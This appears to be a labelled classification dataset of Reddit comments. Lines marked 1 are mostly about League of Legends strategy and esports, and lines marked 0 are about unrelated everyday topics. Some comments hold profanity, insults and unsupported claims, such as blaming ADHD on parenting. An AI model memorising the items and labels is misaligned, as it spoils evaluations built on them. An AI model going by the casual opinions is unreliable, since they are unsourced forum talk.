1	I don't get the hate on caitlyn, she is still one of the strongest ad carries in my opinion. She gets outshined in lategame by kog, trist and vayne and outbursted through all stages of the game by graves and corki. However, her teamfight capability is just huge with the extremely large range, zoning abilities with the traps and the low-cooldown-escape.   Combo that with a superstrong lanephase and you have a decent ad carry with strengths and weaknesses as any other ad.   Most people classify caitlyn as bad because she has no steroid. I'd like to think that her passive combined with her gigantic range makes up for that.
0	This ended up becoming a deal breaker for me. My ex girlfriend would regularly claim that girls don't poop or fart. She would refuse to fart around me, and tried to avoid using the bathroom at my place. It was so ridiculous that it began affecting my view of her. And then she showed that she was absolutely disgusted /turned off if I farted around her to the point of taking it personally and getting upset/crying. We broke up a week after the last incident.   Having an adult deny the very basics of bodily functions is infuriating.
1	I was a season 3 Diamond 2 ADC and am currently Diamond 4 (haven't played much this season)   Proof:   I have played 50-100 games on the PBE with these changes and hope i can provide some insight. As a disclaimer these may be totally off what will actually happen due to meta changes, etc. These are my opinion, however, from watching ADC pros my thoughts seem to coincide with theirs.     Double Doran's into IE seems to be the most common as well as most potent build at the moment. Especially since attack speed is getting buffed pretty significantly. More attacks and more crit chance means more dmg overall. Botrk/Triforce builds seem okay as well. In general, think Season 2 style itemization.     Caitlyn, Jinx, Kog'Maw, Trist seem to be the strongest from my testing but keep in mind this is my opinion and meta changes will also change what people pick. Playable tier seems to be Corki, Ezreal, Lucian, Twitch, Vayne.     The new item is not very good at all. It wont replace any item you need to build so wouldn't even consider it on any ADC other than maybe Blue Build Ezreal. Look to build the new item in other roles!     Do not rush Bloodthirster, it is infinitely better to rush IE. Triforce rush seems okay as well. Think of Bloodthirster as a defensive item before your defensive item if that makes sense. It might be better to get Zeal before Greaves due to the cost changes on both items. Scimintar is very strong as well. Will probably see this over Banshee's in most cases now.       I also think it is important to mention that healing/shielding supports will probably be a lot more popular with the new support item. 25% attack speed for 6 seconds with no internal cooldown is pretty nice and it's pretty cheap. Also, Scimintar will be a much better choice also due to the massive price increase on Crucible.   Despite what other people have posted I think double lifesteal builds aren't good and will only get worse with this patch. Just makes even less since with lifesteal getting nerfed, becoming more expensive, and doing less dmg than an IE build in nearly every scenario. However, BT as a defensive item might be a viable choice.   I think the ADC role will be more snowball and carrying then it is now. You will have less starts to keep you alive early but autoattacking dmg will be at an all time high and spike much sooner than in the past. These changes are both buffs and nerfs. Overall, I think they're buffs in every way except staying alive early/mid game.   Like I have mentioned before this is all my opinion, I have done some math on these changes and think what I listed will hold true. If you have any questions feel free to ask and I will try and get to them when I can. If you disagree that's fine, no reason to freak out :P just wait it out and see what the pros build (which I'll be doing as well).
1	I feel somewhat qualified to answer your post as I have 90 support Zyra games in season 3, 60 wins 30 losses with a top elo of 1850 in NA.   Support Zyra was pretty much completely broken in soloqueue before this nerf.  The main reason for this was actually because of her passive.  It allowed you to play far more aggressively than Zyra's skill set indicated.  Even though Zyra has no escape spells and is easily one of the squishiest champions in the game, you could aggressively zone your opponents in bot lane knowing that even if you got ganked, your opponents had a high chance of dying because of the huge true damage nuke or at the very minimum they would be unable to take advantage of your deaths.   My strategy with Zyra was essentially this.  I would buy one ward and boots + 2 pots (pre item changed) or flask and faerie charm one ward and some pots depending on matchup.  Then I would proceed to only ward against the opposing support in the bot lane bushes and just try to hit snares.  While doing this, I rarely looked at the minimap or tried to time my aggression with where the jungler should be because it literally didn't matter.  I would either hit a snare resulting in one or two kills for myself or my AD carry, or we would get ganked and I would die, taking the opposing AD or Support with me which would make it a 1 for 1.  And then occasionally nothing would ever happen and I would massively outscale the opposing support.   A champion that is nearly impossible to snowball against while having an incredibly strong late game makes for a pretty broken champion.   The main difference that the nerfs made are the reduced projectile speeds and the reduced projectile width of the passive.  Before these nerfs, it was entirely possible to land a max range snare while dying and it was pretty much inescapable even with level one snare.  Now, it's much easier to dodge the snare, much easier to dodge the passive, and the damage is a lot less likely to kill.  So Zyra went from snowball proof to normal and a lot more fair to play against.
1	For some people who may not get why he was banned for what he did (and I am just going to say now that I am not taking either side, I am just pointing what some people may have thought), think about it this way.  LCS players (and other pros/semi-pros) are supposed to be role-models for the average player.  Sure, to the average person, that may not be 100% bannable, and if I didn't know he was edward I wouldn't have hit punish.  But as a role-model, the poor behavior that comes out from him is amplified by quite a bit, just because of his position in the community.  Now me personally, I would have most likely hit pardon, but that is my opinion and everyone's opinion gets flamed so...
1	Honestly, playing in a happy mood completely changes the game. Last night I played a match with 4 buddies. We knew we were going to lose 5 minutes into the game and decided to just have fun with it. We joked around, tried to push 5 mid, etc. We lost, but at least we had fun.
0	As a former Graduate Teaching Fellow (you know, the guy who teaches your 101 class so the Prof. can focus on students that actually care) I can tell you that the school puts a LOT of pressure on Professors to "update" their texts on a regular basis... and by "update" I mean "change to the newest textbook and force the kids to need it".  Schools put pressure on the professors to use "verified teaching materials" as well, meaning expensive textbooks rather than, say, something cheap or free online.   One of the professors I worked for would do so and then tell kids the first day of class that they didn't need the textbook; if they hadn't bought it yet don't and if they had return it.   Trust me, professors (except the ones that write textbooks) hate this shit just as much as the students do.  Most of them, however, sacrifice your money in order to appease the school so that their career isn't held up by a dean/department head who remembers they were the prof. that ignored their "suggestions" to "update" the course materials.   It's all very political too, because even if that professor doesn't care about advancing his career for whatever reason (such as tenure) the department head will screw them on things like classroom assignments and department resources.
0	I assume anyone who thinks these rules are still important once they're an adult is not worth dating. It's a filtering mechanism designed to avoid later on having to listen to horoscopes or whatever other bullshit they'd deem important. I'd rather date someone who's smart.
1	I respect your opinion and understand where you are coming from, but I the rune system is actually important and can be game changing in very subtle ways. here's an example and say there is no rune system at all and we put two players playing the same champ (well just say Vayne for this example) into a 1v1 situation. the first player is lvl 30 is running 21/9/0 masteries as the meta would dictate and this player has played Vayne for 200-400 games. player same lvl running 21/9/0 masteries as meta would dictate and has played vayne for 600-800 games. how does the first player have any chance of beating the other player who has had more experience playing vayne. This is where the runes system comes into play and changes the game for both players, the system allows for each player to choose the many different runes that compliments they specific playstyle. so we'll that the first player runs flat armor, armor per lvl, and flat AD runes with lifesteal quints. and we'll say that the other player plays more aggressive with attack speed, Flat AD, and life steal runes with life steal quints. Who wins that fight? Does all all that experience with vayne still help that second player now? Or does the defensive runes give the first player enough armor for him to come out on top? With runes you can better play a champ the way you want to play him and make your champ totally different from anyone else's. but the way rune system is set up with its high ip prices (combined with the low ip income averages per games [NOT INCLUDING FIRST WIN OF THE DAY]) and the meta game required way of composing a rune pages, as well as a few other variable factors; there isn't a lot of room for you to just make a runepage that suites your play styles. You either go with the meta which is very basic and generalized for the general population of player. Or you play games upon games upon games earning ip to buy the rune you think you want then spending weeks or even months of trial and error of selecting different runes, testing them against various lane match ups and team comps, finding that perfect page that suites your style and that makes you the unstoppable beast that you want you to be for that one champ you really like or are really good at (then repeat process again for all other the champs that you play IF you even have another runepage to dedicate for another champ. most likely you going to go with the meta just because its less work for you to do all you have to do and learn the meta and try to fudge it into you playstyle if you can. this is why rune system NEEDS to change. Rune Tiers 1-2 are a trap for new players and need to be taken out of the game. Tier3 rune prices need to be reduced. Runepage IP prices need to be reduced or the number of pages you get at 6300 ip needs to be increase to at least 2 or 3. Having more pages allows you to have the ability to be liberal with your rune comp and be able to designate pages to champs, champ playstyles, or multiple roles.
1	It's down to two well known biases, self-serving bias and confirmation bias.  We want to attribute our successes to actions on our part and our failures to others and things outside of our control, this is a self serving bias, in which we try to make ourselves look as good as possible. If we are failing in game "ELO hell" in a nice vacation spot from the thoughts that it might actually be that we aren't any better.   After we make this assumption that we are losing our lol games because we are in ELO hell and and the ones we win are because of our own gameplay we look for evidence to prove this fact (confirmation bias) so every time we see someone with a suboptimal build or doing poorly in lane we will immediately attribute our loss to that fact, thus confirming in our own heads that the loss wasn't out fault whereas ones own gameplay is never really 'optimal' especially in a game like league there is always a ton of things you could have done better.   At any ELO there are good and bad players, feeders, trolls and afkers, this is why you hear the estimation of ELO hell to be anything from 1000 to 1600. Many players have deliberately dropped their ELO's to 800's and carried their way back to 1900 to prove there's no ELO hell, this is also true of pro's smurf accounts.   I know it's been said a million times before but there are 4 random spots on your team and 5 on the enemy team. You are therefore 20% less likely to get a troll and if you can't influence the game to get a win rate greater than 50% over a large number of games (exponentially decreasing the chance that you get troll every game and the enemy team never does/random chance with each new game) then that is the ELO you deserve to be at, hate to break it to you.   Edit in response to other posts:   If you claim that your ELO does not reflect your amazing K/D ratio etc. (that you got by being more careful than your teammates or whatever): the opponents have people like you too, except they go to other lanes and gank them, get fed off the bad players on your team, help their laners get fed and carry the game, you can do the same but if you stay in your own lane protecting your precious K/D then you'll have a good score, yeah... but you'll also lose the game, because the opponent is taking advantage of your bad players and you aren't doing the same for his. Again, you are the deciding 1/5 constant that the enemy does not have. If you cannot swing a win for your team in more than 50% of cases, then you deserve to be at that ELO.
1	Assuming you get first blood and make it to your first camp at 1:55 your next smite wont be up until 3:10 so you wont have it for your level 2 gank it is not usually up until i have walked from red to wolves. So by the time your second smite is up anyone you want to gank will be level 2 and they will already know you have first blood in your pocket. So they should not be pushing and be careful of that level 2 gank which is only possible under a weird distinct set of circumstances which occurs less than 1% of the time for vi players because vi is terrible at invades unless she starts q in which case she needs to get that first blood because her clear will be garbage because she started Q. If you're starting E you're probably not expecting a leash or starting blue where you're not smiting an attack speed debuff but a hit me debuff. Which is fine but you're still not soloing red at level 1 and if you do you will not be healthy enough for a meaningful gank.   You're entire premise is that you invaded as vi with Q and got first blood which is highly unlikely the only way i really see this happening is if a blitz or thresh pulls someone into your fully charged Q while they were already poked at level 1.
0	People need to understand that it's not just Comcast that's ass. Even with people who do have options, it's pretty much just as shitty. I have an option between Verizon, DirecTV, Cox and DishTV for cable; Verizon and Cox for internet . All equally as shitty. Having options in ISPs does not always tantamount to a win.
1	I like to check the minimap as my auto attack animation goes off for a last hit and last night I saw the enemy jungler bot and the enemy midlaner mid so I dived straight onto the enemy top laner who was out of position. 2 seconds later the enemy jarvan jungler eq's out of the top lane brush and I barely escaped with my life and was left thinking wtf I saw you bot...
0	Thats simply because its not SciFi in any sense. Its much closer to a pure fantasy show that just happens to go into space on occasion.   If you just call the Dr a Wizard instead, absolutely nothing changes.   The new Dr is an average action fantasy show with a terrible soundtrack. Its quite fun at times too!
1	Good point, and I don't even remotely know the whole story but didn't she play a game on Lee sin which he disapproved of so he posted nude pictures of her on Facebook?   Kind of shitty to point and laugh but the guy did bring his drama out in the public. Not saying anybody is in the right here nor do I have any idea why his life is ever linked online but it seems to come up so it should be known that everybody involved seems like they were being shitty people.   So claiming that he'd never go out of his way to hurt someone by hanging out with somebody they dislike seems quite hypocritical when he's done far worse.   Some people are just digging their own holes.
1	Coming from a Rengar player   (I may not be the best, but I've been carrying consistently with him for  the past week in Gold.)   My Rengar credibility :     This is also why Rengars laning phase is now really bad, Rengar can't win any engagements. He has to try and spam his heal and hope to farm it out. But the base damage on his W has been reduced meaning he can't even trade effectively.      This right here shows that you have little to no understanding of how to actually play Rengar. Rengar should be maxing E in most lanes and you shouldn't be engaging in the first place, with Rengar's kit you should abuse the brush to constantly auto your lane opponent and using your E to prevent them from chasing/retaliating as your run back into your brush. To win in lane you should be chipping at their health with constant harass using your E and passive. In fact, the nerf they put on Rengar's Q by changing the ferocity damage ratio from 2.5 to 2.0 isn't a big deal in lane either since he is still capable of getting first blood immediately upon pinging level 2 if you harassed well enough to kill them with an E and a double Q from the brush with ignite. In my opinion, Rengar's passive is one of the strongest parts of his kit since it allows him to easily harass his lane opponent and prevent them from farming once you have even the slightest advantage since your poke and harass is so strong.   I don't think Rengar's Q needs a buff at all, in my opinion Rengar is completely fine as he is in his current state. I've been consistently performing fine with Rengar over the past week and am capable of winning a majority of the his top lane match-ups. Rengar is champion that requires a lot of knowledge of your kit and your enemy's kit, Rengar's current kit along with his passive makes him a huge threat and nuisance in lane by simply using the bush to your advantage or roaming. Rengar as an assassin is capable of killing an enemy carry by just popping ult and jumping in as long as they have no vision, you should be able to get the kill off as long as you have sufficient damage and honestly all you need is a BT in terms of damage if all you want to do is kill their carry. But, I do have to say that Rengar relies heavily on snowballing in order to carry out a role as an assassin since damage is expensive. Tank Rengar does very little damage when built as a tank and isn't a very effective one at that but tank Rengar should just be using his E in terms of full ferocity which in most cases should lead to a dead carry if you're capable of getting your snare off.
1	I have limited experience with Aatrox, but I do like Aatrox; He's thematically cool and fun to play as sometimes. The problem I have with him and the reason I don't like to play as him is the cool down on his revive. He really relies on it (more so than Zac/Anivia)to drop aggro, get his damage/CC off, or duel effectively.   I find myself avoiding fights even at points I have power spikes and should be looking to scrap. It just feels bad every time you see an opportunity to get a pick but hold back because you're still waiting on the revive CD. Its not fun being held back by one cooldown so much. Its just annoying. I would gladly give up power somewhere else from his kit to get a lower passive CD.   Its not fun always waiting when you're playing a badass lifestealing all-in based fighter- I don't want to wait I want to fight, but it feels stupid fully committing to fights without it
1	I got out of Plat by being ahead of the Meta,  watch Streams and pay attention to unconventional picks (for me it was Sunfire Kata top). Once you see something that you think works play it a bit in normals to figure out more advanced stuff (e.g. Matchups). If you still think my your Tactic/Pick is good take it to ranked,  and if you play it correctly you can use the benefit of surprise to win most of your games.
1	I don't really care about downvotes. If they don't understand me that's their problem.   I'm not interested in comparing features. That's not what I'm getting at. This is about the player, not the game.   My point was that LoL is challenging and that saying it isn't indicates someone prefers another game, not that they're too good for this game. Instead, Dota2 players argue LoL is easier or weak but play below 2400 ELO when they try it. If it's so easy, play better than that! Wait, you can't? Other people are better than you? You die from time-to-time? Then it isn't an easy game.   I'm also not arguing Dota2 is easier or worse by any means. But for some reason, if I were to go and argue that the teamfighting makes LoL harder, I'd be laughed out of the room and lose all my karma. You'd know it was bias and you'd ask me why I wasn't the best teamfighter there's ever been and why hasn't a Dota team recruited me yet to transfer my epic teamfighting skills. Yet when someone comes here and claims LoL is for noobs, everyone bobbles their heads in agreement.   And disclaimer: I have a Dota2 key. I don't play it. I don't really want to re-learn a game that plays almost exactly like the one I'm already playing, with the difference that it's harder to enjoy than the one I'm playing but you get the same results. But that's my preference and I'm not claiming otherwise.
1	Major Changes"?   They added a bunch of new champions and a bot mode.
1	Okay. Let me break this down for you.   1 Greater Quintessence of Critical Chance imparts a +1.86% critical chance.   That means you are 1.86% more likely to score a single critical strike.   That in no way shape or form means that you WILL crit them. On any given attack a you have a 1.86% greater than normal  chance  to strike critically. There is no  guarantee  that you will.   Stack a couple of those runes, and your odds of a critical hit will be substantially higher than the norm. The maximum critical strike chance you can reach at level 1 without items is 20.25%, excluding Ashe's and Tryndamere's passive. but you are wrong in saying that you will absolutely no matter what in any given scenario crit. That simply isn't true.   We may well be arguing semantics at this point, but ultimately i'm technically correct - which, as we all know, is the best kind of correct.
1	I know that feeling. There's a number of things I do to boost my team's morale in my games(silver 1 atm);   Play strong early game champs, such as Draven, to make sure it is I who dominates the lane. When the enemy team starts /all spamming to report X or Y, it means they are starting to fall apart. Get in their head, but dont be a dick.   I once played Draven vs Tristana matchup, where I won the level 1 trade and didnt give up my advantage. 10 minutes later; Tristana: we'll see late game! Me: There will be no lategame. Which I assume was a big morale hit. They indeed FFd quickly.   Also, theres often a situation, where enemy picks some stupid assassin like a Fizz or something, and your poor midlaner keeps dying to him every minute or so. Then the entire team goes full-retard mode, saying '/all report viktor', to which I usually tell them to (literally) shut the f up and play the game. It is now 30th minute, Fizz is 16/2 or so, but since it's silver, the fact that he destroyed poor Viktor is now meaningless, because he didnt roam enough while his other lanes struggled. Teamfight time. Fizz gets CCd, dies, push. Another teamfight, CC correctly, the game is yours.   'OMG 16/4/0 LOSE REPORT MY NOOB TEAM -.-' -Fizz 2013   As for playing support, make sure you have a premade adc buddy to play with. My soloq support experience is that you can lose so many games just to misunderstandings with your partner - and that tends to happen way, way more often than it should.   I guess the
1	Some people are saying it's tilt and I disagree. I've gone on a 2 week losing streak once and i tried to space out my matches so that I made sure I wasn't tilting. Usually this is the trend I see, I go on a winning streak where they're mostly stomps, and then I go on a losing streak that are mostly stomps. There is rarely a middle ground. I believe that's because the matchmaking system pairs you in favorable teams when you're going on those winning streaks, as in you win more because you're matched with players that are better than the ones on the enemy team. After you win about 15 games in a row and climb up two divisions. Instead of matching your team against another team of equal skill, they assume you can carry lower skilled players on your team over their better counterparts on the enemy team. So basically, it assumes you're the sole factor for your winning streak and thus are good enough to carry the weaker players against the stronger players. So it's not tilt, it's more like you're just not good enough to carry those lower tiered players yet, and then eventually you get this dull period where both teams are even for another 25-30 games. That's what I believe at least.
1	riot has done an amazing job listening to the community. Obviously they can't input every idea as it may inflict with other problems most people overlook and also they have way and goals set for themselves as a company.   Riot is one of the best companies out there in terms of support. I don't see this kind of support from other companies other than valve. Look at blizzard for example, they ignore alot of the issues with the game and thats why some people have switched.   Also another big company is activision. Call of duty one of the biggest games out there and yet, the company doesn't listen to the community much(getting better) there are many unbalanced things in the game that isn't fixed for a long time.   When you look at an idea on reddit. You only read about the positive things that it can change, but often times there are many negative factors to it which many people don't think about.
1	I don't play League anymore. Just /r/battleparty for me. It's kinda like a Dominion/Twisted Treeline/Heroes of the Storm mix. There are little times when you walk back to base since there is no Recall and you have health packs. The game is usually based around teamfights since the minions walk too slowly and are cleared too fast to allow for good sieges. The jungle is worth a lot, and is contested; drawing fights away from towers. The level system is implemented on the items, not skills; allowing for progression and relevant teamfights at level 1. You scale with XP, not gold and you don't scale too fast; allowing for a more controlled level of snowballing that doesn't allow the game to end after a lost fights. Also, the devs balance the game, and all the champions, even low tier ones, are usable. Also, they are planing on releasing more champions and items (backpacks). The backpack system is also interesting since it allows the foes to predict what you can build and counter your build with theirs, leading to item mindgames. All of the game is very enjoyable. It is competitive, since it lacks a normal ladder. It also only has NA servers, so you may lag a bit when not playing from NA; this hasn't affected me, I reached Gold playing mechanically intensive champions (Gunter and Magic Man, mostly) from EU. Also, there is no open chat system, hence no toxicity!
0	Back in highschool I was headed to a house party when I got the feeling that someone was following me. For some reason I noticed them while still on a main road, their headlights were exceptionally bright I think, and decided to keep an eye on them to see how long they were behind me for. Well after about the fourth turn on small residential roads that led to the house party with this guy still on my ass I decided it was time to find out once and for all. I pulled into the cul-de-sac where the party was but ripped around it to head back to the main road and lose this guy. Just as I was about to gun it out of there the vehicle pulls into the neighbors driveway and parks...
1	It's not too late the mode can still be salvaged..Though when we take into account all the other things their Dev team have to do or more precisely what we want them to do. Dominion is probably very low on that agenda.   Dominion also has that x-factor what if having a ranked queue did make it popular?..Riot would then be faced with a balancing shit storm from years of neglect that no designer there probably wants to tackle at this present time.   I think once Summoners Rift finds a stable balance where their live design team aren't having to change stuff every moment and once they finish up with their visual upgrade of summoners rift..   It wouldn't surprise me if sometime next year the Rioters sit down and have a serious discussion about what they want to do with Dominion for the forseeable future if they haven't done so already...   It's out there so regardless of whether Riot like it or not it has it's fans. They need to weigh up the pros and cons. Is it going to get in the way of their core game or can they find room to adequately accommodate it?.
0	I am not trying to be a victim, I just thought it was odd that they used a word is not used to refer to a person but instead to something about the person. It is a adjective, not a noun, at least I have never seen it as a noun until now.   A good reporter (and translator, some most people are saying this is a different language) would paraphrase something into a context that makes sense to their readers. In other words, the quote should be have used the word man in brackets because frankly more than anything it looks odd.   The way the word is used in the English language means that we don't go up to people and say "Hey male, what's up?" You would using an adjective as a noun, ex. you see a pretty woman and say, "Hey pretty, would you like to go out with me?"
0	I desperately don't want children either, but I can't help myself. It's why I make sure my partner doesn't want children and is not likely to change her mind.   There are very few acts that feel as satisfying as this one, because from a biological perspective, this is literally what the biological meaning of life is. To make more life. This is the easiest and natural way to do it, and your brain knows this, and rewards you accordingly for your efforts.
1	OGN's format is more competitive and rewards the better teams. Personally, I don't give a fuck about last place or shit-tier teams, I would rather have them get relegated early to save me from watching cringe-worthy matches.   For the NA LCS this year watching any EG or CoL match has basicaly been a waste of time, and cringe-worthy as hell. I would rather filter out the shit-tier teams early and get progressively higher quality matches through the season.   It was so much fun watching MyM and Velocity get absolutely wrecked every week, right? Shit-tier teams who can't innovate or were never good in the first-place shouldn't play in a pseudo-competitive environment and plague the viewers for fucking two months(or however long a split lasts).
0	I live in a state that does. I'm a firefighter myself, and was talking to a police officer who was offering cover to a neighboring departments medic unit (he was riding back to district with them in the medic unit). A vehicle failed to yield while they were going code 3 (lights and sirens) to another call, to which they got disregarded, and decided to pull behind this guy who finally yielded and the cop jumped out and gave him a ticket. Funniest shit ever.
1	As a hockey player, I'd just like to say that you obviously don't love hockey. If you did you'd realize half the game isn't just big guys brawling it out.   Yes, there are fights, but that's to be expected from a high contact sport. Fighting is a small part of the game.  The best way I can describe it is like crashes in NASCAR. It's what a lot of people who aren't into it think of when it's brought up and is the most exciting part for them.
1	AP champs shouldn't be able to kill tanks anyway. As you said, AP is burst, AD is DPS. AD champions should deal consistent damage to tanks. Tanks should be able to survive any sort of burst from an AP champion. AP champions should be able to burst down AD champions.
0	I feel like ADD/ADHD is over diagnosed and it's the result of shitty parents who have their kids watching TV/playing games as their only source of stimulation as opposed to forcing them to go outside and expend all that's energy.
0	That whole notion that Liberal is better than managing the country/ economy than Labour is a misnomer, and if you look back through history, it really doesn't pan out.   Overall, Government takes too much credit for successes and too little blame for failures. Take Howard- he banged on about being able to keep interest rates low, but they spiked on him.   Its a lot like real estate salesmen: when the market is up and they sell a lot, they brag about how great they are, how they achieved high prices, how quick they sold, all because of them.  When they aren't selling, when prices are low, they just blame the market. There's no mention of their skills and value then, is there?   The other thing is, all parties are essentially singing to the same tune. The research done & recommendations put forward into policy & economic reform is independent, and you can bet that within a decade or two, every one will have been adopted, regardless of who was in power.  They'll sell it as if its their idea/ initiative, and the opposition will fight it, but they all know what is going to happen. The mining tax would have gone in if Liberals had been in power, perhaps in a slightly different guise. The GST was introduced under Howard, remember? Labour deregulated the banks (something rather right-wingish to do), etc. etc. etc.   For all the opposition, there is little, if any, fundamental difference.
0	OP "dated" an Asian girl. So should at least be able to differentiate between girls that look like her and girls that don't.
1	Woah... yea I got that he was making a joke... but the original picture is of link... which was corrected TWICE (I Guess third including me) for torrential downvotes... clearly context isn't found this low in the comment totem pole... but yea... don't draw link to indicate Zelda...?
1	Like everyone else here, I can only really weigh in with my opinion on the matter. I became interested in LoL during the 2013 allstars, when I saw it on Twitch one night. I decided I liked Dyrus and MadLife, so the teams I supported became TSM and CJ Frost. Right now, both those teams have changed heavily since I started playing, and if MadLife or Dyrus was to leave their respective teams, well, I'd probably drop my support for CJ Frost, because I follow MadLife more than his team, though I'd still follow TSM because of Regi and TheOddOne, even if the current roster isn't a group that I'm necesarily fans of.   Further to that, I also liked scarra a lot, so Dignitas was my second favourite team in NA. However, no scarra on Dig means no support from me, but I'm also not going to support CLG just because he's on that team, because I'm not a fan of CLG.   This is kinda different to how I feel about the EU LCS, where I support players such as Alex Ich, but stick to the actual teams for SHC and CW, regardless of their players.   In Korea on the other hand, I kinda got behind SKT after last years worlds, and despite the roster changes, I still support them. I don't think I would necessarily stop if their roster changed entirely either, I have no desire to support Curse just because Piglet is there now.   In terms of China, I don't really follow the LPL, but I was supporting OMG all throughout worlds, partly because of Gogoing, but also because I just like the team.   It all sounds kinda messy but, while I generally support players first, there are instances where the actual team/org is getting my support as well. I think it comes down a lot to the fact that certain players are much more the face of their teams brand (pretty prominent in NA), where as other teams don't really have public faces as much, and so my support does fall behind the org, not just it's players.
0	Back in June we had a particularly good day at work and I asked if everyone wanted to go in on pizza together.  3 people said yes they would chip in.  I knew what would happen and said screw it... I collected the money from 2 of them and just paid for 3 larges myself, knowing others would want a slice, and just hope they would chip in.  The first 2 had paid me $5 each, and the third said she "only had $3" which I had said was fine.  She NEVER gave me the lousy $3.  I was actually ok with that, since I asked several other people if they wanted "a slice" of my pizza.  NONE of them offered to contribute.  I was still ok with that.   The kicker comes when a person walks in, and some chick who did NOT pay anything *offers that guy a slice."  Are you fucking kidding me?  That is my pizza, NOT yours to offer bitch!
0	One early Easter weekend morning (~ 6:30 am?) while working at a gas station I'm sitting there doing a crossword and eating a 'liberated' *Rolo ice cream bar when I had a regular customer come in, quite drunk, and asks to use the phone. I say, sure, why not. I normally don't let the sketchbags in the area use the phone (or have free coffee), but this sketchbag gives me the heads up about other uber-sketchbags that might be doing sketchy things while I'm working and looks out for me when I do night shifts. It's a feel good sketchbag-symbiosis relationship we have.   Anyway, he gets on the phone and starts arguing with someone on the other end. Fuck this. Fuck that. Fuck you. Etc. After a couple of minutes of that he hands me the phone back, thanks me politely and leaves. Fast forward like 15 minutes later when he comes in and asks to use the phone again. Oh, as a side note we used to have payphones in the neighborhood but crackheads kept taking or breaking them. Now while he's on the phone I notice he's got these huge pair of scissors. Like...just massive. You could slice a sail in half with one snip huge. So he's on the phone screaming at whoever and telling them to come get him and that he'll fuck them up...when across the lot I can see some dude walking towards up yelling on his cell phone and carrying a big ol' knife. I say to the regular, hey man, I think you're friend's here to see you. He turns around, passes me the phone (thanking me politely again) and goes outside.   The two rush each other and meet under the gas pump canopy. They square off, then dart to the squeegees. Now equipped with a squeegee and a sharp thing they start trying to pelt and stab one another. I'm inside using the camera controls to zoom in while humming Duel of Fates. I probably  should  call the police, but this isn't any of my business so I'm staying out of it until someone goes down. They sketch-fence for a bit (even so far as taking it out into the completely quiet Easter morning street), until the newcomer with the bowie knife bails with the regular in pursuit (charging after him with the squeegee like its a battleaxe) and out of sight.   So i go back my crossword for a bit when the cops show up. They come in looking really perplexed because someone in the neighborhood saw the fight and thought we were getting robbed (the regular customer had a shirt the same color as our uniform shirts). They say, are you okay? I say yeah, why? Someone said you were being attacked. Oh, that? Yeah, I say, two guys were trying to kill each other outside the store but they ran off. S'all good guys. The cops look at me like I've got two heads. What did they look like? No clue. Maybe one had a black jacket. Where'd they go? No idea. Ummm...that way. Maybe? So they shake their heads and tell me if they come back to give them a call.   A few hours later the regular comes back with two broken squeegees and apologizes for breaking them. I say no problem man, happens all the time. We fist pump. I'll just tell the boss what I told the cops. I have no clue how they got like that.   I didn't ask what happened. The first rule of Squeegee Fight Club is you do not talk about Squeegee Fight Club.   And that's what happens to squeegees some of the time.   *Depending on the microwave you have available, take out of Rolo ice cream bar and pop it in the microwave for like, 15 sec. It melts the inside caramel warm but the ice cream and shell are still cold.  Fuckin' baller.
1	You really shouldn't put so much importance into glib internet one-upsmanship   Lol. Just...lol.   Okay, I'll explain. What I've so far said: You're whining, also you seem to really force yourself to sound clever. This is pretty much the only thing I've said.   You however seem to think that I've said: I don't understand the clever joke you made! I'm trying to be superior to you! I am a typical anonymous Reddit malcontent who is infuriated by your scathing criticism of Riot. I'm attempting to discredit and belittle you because you don't share my viewpoint. I'm smug, full of shit and crippled by feelings of inferiority, thus I am forced to mock my betters on Reddit.   Again, I said: Wow. You really, really like to whine.   I agree that the Vandal Vladimir model is too small. I never said anything to the contrary. Strike out the "U SUCKS FOR NOT AGREEINGS WITH ME".   Your joke was trite and unfunny. Combined with all of the whiny comments you made earlier made it look like even more whine. I mean, c'mon. You're spending real money on a product and you don't even examine it before you buy it? There are countless skin spotlights available on youtube dude, c'mon.   Sure, maybe you didn't realize how small the model is, even with the videos. Creating a post on Reddit to raise awareness of this is fine. However, you decided to add comments where you acted like a spoiled child. That's what triggered my comment.
0	My cousin, we'll call him Aaron, was a total dick when we were kids and got humped by our dog Buddy. Aaron was in the process of chasing my brother onto our lawn trying to pick a fight when he tripped and Buddy mounted him. Aaron kept saying "he thinks he's my backpack!" Buddy just went to town on him, we didn't let him live that down for a few years.
1	I've logged over 200 games with swain, I do consider him my "main" champ.   My advice:   Runes: Quints: Magic pen Marks: magic pen Seals: mana regen per level  Glyphs: CDR % reduction   Ability Priorities:   R>E>Q>W Reasoning: Swain's E In my honest opinon is almost over powered. It % of damage increase is VERY strong at early levels. If you get an opponent around 65-70% health around level 5 you can combo then down with an " Q-E-W-ignite" and don't forget your auto attacks also get the bonus increase in damage too!(that alone will add a fair amount to your early burst)   You go Q after E because the slow is very helpful in landing not only your W but helps you escape from many melee champs early in game.   W is last because when level'ing it all you recieve is a damage increase and CD goes down.   Build: I ALWAYS "ALWAYS" start boots 3 pots, I would suggest this to any one over dorans. Why? Well I'm sure you noticed swain's auto attack range and skill range isn't the largest and he can be out ranged rather easily but champs ( LB, Ryze Q spam, morg Q etc). Going dorans means that if you take too much harass early on, or from a fail gank perhaps then you will NEED to go back. Boots and pots gives you much more staying power in lane. Which with his pasive (10 mana restored on last hitting creeps) you can just camp lane all day!   Boots 3 pots Rod of Ages Hextech revolver DeathCap   Situational:  Rylai's isn't bad on swain, and neither is zhonya's. Though i only get these items in specific situations. Rylai's  i pick up usually with zhonya's, this happens in games where my team comp is usually a bit squishier. Or perhaps my team doesn't have a real tank.   DISCLAIMER: i really suggest not playing a tanky swain until you become comfortable with him for it takes a lot of going in and out/poking in bird form. If you are caught even with a tank build (and zhonya's) late game you will still drop in seconds.   Occasionally i will go a build something along the lines of 2-3 dorans then sorc boots followed by Deathcap. This is a build i use either when A. i'm doing VERY well and i want to rush Deathcap and finish the game early, or B. i am not farming well and the other team doesn't have a lot of burst (the 3 dorans will make you fairly tanky up until around 20 mins).   Role wise, I've mostly  midd'd with him, though i really do enjoy laning him with a partner (once you get the root down you can start getting Firstblood's like crazy in a duo lane). He does fairly well against some tops, but others like (rumble, udyr) really any champ with sustained damage or just hp sustain will give him a lot of problems and can bully him out of lane repeatedly.   And sadly very few streamers play swain ='[ i've seen SK oce play him on a few occasions but that is really it.   The biggest thing for swain:   GET THAT W DOWN- i can't tell you how many times i've savd a team mate with a well timed W when the enemy team is chasing them. Its range also helps you root the more "bold" people in team fights who might take that one extra step out of position.
